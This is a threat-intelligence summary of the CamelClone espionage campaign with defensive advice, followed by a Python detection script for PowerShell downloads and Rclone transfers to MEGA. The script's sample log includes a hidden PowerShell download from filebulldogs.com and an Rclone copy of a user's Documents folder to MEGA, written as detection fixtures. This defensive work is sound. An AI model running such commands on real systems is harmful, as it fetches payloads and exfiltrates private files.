
CamelClone Uses Public File-Sharing Sites in Government Cyberattacks
Why It Matters
The attack demonstrates how cyber‑espionage groups can weaponize everyday cloud utilities, complicating detection for critical‑infrastructure defenders. It underscores the urgency of monitoring legitimate tool usage and public file‑sharing traffic in high‑risk environments.
Key Takeaways
- Spear‑phishing ZIPs deliver LNK shortcuts executing PowerShell
- Malware loads from filebulldogs.com, avoiding traditional C2 servers
- Rclone used to exfiltrate data to MEGA cloud storage
- Targets include government, defense, diplomatic, and energy sectors
- Campaign spans Algeria, Mongolia, Ukraine, Kuwait, indicating geopolitical focus
Pulse Analysis
The rise of “living‑off‑the‑land” tactics has pushed threat actors toward public file‑sharing platforms and legitimate utilities. By hosting malicious payloads on filebulldogs.com, the CamelClone operators sidestep conventional command‑and‑control servers, making network‑based signatures far less effective. Coupled with Rclone—a trusted synchronization tool—this approach blends malicious activity with normal traffic, forcing defenders to rethink detection models that rely on binary reputation alone.
Operation CamelClone’s geopolitical focus reveals a strategic intelligence‑gathering campaign. The chosen lures—Arabic, Mongolian and Arabic‑English ZIP files—mirror the diplomatic and energy interests of Algeria, Mongolia, Ukraine and Kuwait, suggesting state‑backed actors seeking insight into policy shifts, defense procurement and regional alliances. The use of MEGA for exfiltration, coupled with anonymous onionmail.org email accounts, adds layers of anonymity, complicating attribution and response efforts across multiple jurisdictions.
For organizations in the public sector, the lesson is clear: trusted tools can become covert data‑exfiltration channels. Implementing strict application allowlists, monitoring outbound traffic to cloud storage endpoints, and employing behavior‑based analytics for Rclone usage are essential safeguards. Regular phishing awareness training and verification of ZIP attachments can disrupt the initial infection vector, while threat‑intel sharing on IOCs such as the listed SHA‑256 hashes helps accelerate detection across the supply chain. Proactive controls and continuous visibility are now mandatory to counter these sophisticated, tool‑abuse campaigns.
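The behavior‑based detections recommended above can be expressed directly against endpoint telemetry. The following is an added example written for this page (it is not code from the article or from the CamelClone research), covering the two stages the Key Takeaways describe: PowerShell launched under Explorer (the LNK stage) reaching a public file‑sharing site, and Rclone transfers or non‑browser connections towards cloud storage. The `key="value"` log format, the host names, the `ALLOWED_RCLONE_HOSTS` and `BROWSERS` sets and the MEGA domains are assumptions; filebulldogs.com is the one domain taken from the page.

```python
"""Behavior-based detections for the tool-abuse chain described above.

Added example, not from the original article. The log format, host names,
allow-lists and the MEGA domain names are assumptions made for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Public file-sharing / cloud-storage domains worth alerting on.
# filebulldogs.com is named in the article; the MEGA domains are assumed.
WATCHED_FILESHARE = ("filebulldogs.com", "mega.nz", "mega.co.nz")
# Hosts that are expected to run rclone (backup jobs etc.) - placeholder value.
ALLOWED_RCLONE_HOSTS = {"backup-01"}
# Browsers talking to MEGA is ordinary user traffic; other images are suspicious.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass
class Event:
    kind: str               # "process" or "network"
    host: str               # endpoint that produced the event
    image: str              # process image basename, lower-cased
    parent: str = ""        # parent image (process events only)
    cmdline: str = ""       # full command line (process events only)
    dest_host: str = ""     # destination hostname (network events only)


def parse_line(line: str) -> Event:
    """Parse one constructed key="value" telemetry line into an Event."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return Event(kind=fields["kind"], host=fields["host"],
                 image=fields.get("image", "").lower(),
                 parent=fields.get("parent", "").lower(),
                 cmdline=fields.get("cmdline", ""),
                 dest_host=fields.get("dest", "").lower())


def parse_log(text: str) -> List[Event]:
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def _watched_domain(text: str) -> Optional[str]:
    """Return the first watched domain mentioned in text, if any."""
    t = text.lower()
    return next((d for d in WATCHED_FILESHARE if d in t), None)


def detect(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (host, rule, detail) alerts for the events that match a rule."""
    alerts = []
    for e in events:
        if e.kind == "process" and e.image in ("powershell.exe", "pwsh.exe"):
            # A double-clicked LNK runs its target under explorer.exe; PowerShell
            # started that way and referencing a file-sharing site is the
            # download stage of the chain.
            dom = _watched_domain(e.cmdline)
            if e.parent == "explorer.exe" and dom:
                alerts.append((e.host, "powershell_fileshare_download", dom))
        elif e.kind == "process" and e.image == "rclone.exe":
            # rclone itself is legitimate, so key on where it runs and what it
            # does: a transfer verb on a host not approved for rclone.
            verb = re.search(r"\b(copy|sync|move)\b", e.cmdline)
            if verb and e.host not in ALLOWED_RCLONE_HOSTS:
                alerts.append((e.host, "rclone_transfer_unexpected_host", verb.group(1)))
        elif e.kind == "network":
            # Outbound connections to watched storage endpoints from anything
            # other than a browser (covers rclone reaching MEGA's API).
            dom = _watched_domain(e.dest_host)
            if dom and e.image not in BROWSERS:
                alerts.append((e.host, "non_browser_fileshare_connection",
                               f"{e.image}->{dom}"))
    return alerts


# Constructed sample telemetry: one compromised workstation, one benign user
# browsing MEGA, one approved backup server, and one harmless PowerShell use.
SAMPLE_LOG = """
kind="process" host="ws-diplo-07" image="explorer.exe" parent="userinit.exe" cmdline="explorer.exe"
kind="process" host="ws-diplo-07" image="powershell.exe" parent="explorer.exe" cmdline="powershell -w hidden -c Invoke-WebRequest https://filebulldogs.com/d/PLACEHOLDER"
kind="process" host="ws-diplo-07" image="rclone.exe" parent="cmd.exe" cmdline="rclone copy C:\\Users\\a\\Documents mega:drop"
kind="network" host="ws-diplo-07" image="rclone.exe" dest="mega.co.nz"
kind="network" host="ws-eng-02" image="chrome.exe" dest="mega.nz"
kind="process" host="backup-01" image="rclone.exe" parent="services.exe" cmdline="rclone sync D:\\backups s3:corp-backup"
kind="process" host="ws-eng-02" image="powershell.exe" parent="explorer.exe" cmdline="powershell Get-ChildItem"
"""

if __name__ == "__main__":
    for host, rule, detail in detect(parse_log(SAMPLE_LOG)):
        print(f"{host}\t{rule}\t{detail}")
```

The three rules deliberately avoid binary reputation: each one keys on parentage, command‑line content, the host's role, or the process‑to‑destination pairing, which is what survives when the payload host and the sync tool are both legitimate services. In production the allow‑lists would be fed from an inventory rather than hard‑coded, and the watched‑domain list would be sourced from threat‑intel feeds.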